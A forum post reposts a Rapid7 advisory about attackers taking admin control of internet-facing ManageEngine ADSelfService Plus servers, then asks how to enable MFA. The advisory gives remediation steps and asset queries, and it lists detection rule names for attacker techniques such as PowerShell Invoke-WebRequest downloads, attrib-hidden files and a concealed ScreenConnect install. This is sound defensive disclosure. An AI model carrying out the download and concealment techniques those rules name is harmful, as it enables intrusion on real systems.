Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances

Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances

FYI anyone with internet facing selfservice should act quick

Rapid7 reporting

Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances

Rapid7 Managed Detection and Response (MDR) recently observed several incidents in which remote attackers have compromised internet-facing systems running ManageEngine ADSelfService Plus in managed customer environments. The attackers used valid ADSelfService Plus admin credentials to gain system-level access.

Our team is working with the vendor to investigate potential root causes and determine remediations. We are notifying our customers out of an abundance of caution so that they may take steps to assess and mitigate risk to their organizations.

Recommendations:
If your organization uses ManageEngine ADSelfService Plus, we strongly recommend:

  • Changing the “admin” user’s password and enabling multi-factor authentication (MFA) for this account
  • Taking the affected systems offline entirely if suspicious activity is observed

What can Rapid7 InsightVM users do to determine their exposure?
InsightVM customers can use Query Builder to find assets running ADSelfService Plus with the following query: `software.product` `ends with` `ADSelfService Plus`.

Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for `Software name` `contains` `ADSelfService Plus`.

Does InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this attack. We recommend that you review your settings for these detection rules and confirm they are turned on and set to an appropriate rule action and priority for your organization:

  • Suspicious Process - Powershell Invoke-WebRequest
  • Attacker Technique - Attrib Sets File Or Directory As Hidden And System
  • Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command
  • Suspicious Process - Zoho ManageEngine Spawns Child


We have also added the following detection rule and prioritized it as Critical:

  • Attacker Technique - Hiding ScreenConnect With Attrib


Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary.

For up-to-date information on this threat, please refer to this article.


Does anyone know how to configure the admin account for MFA like indicated in the article?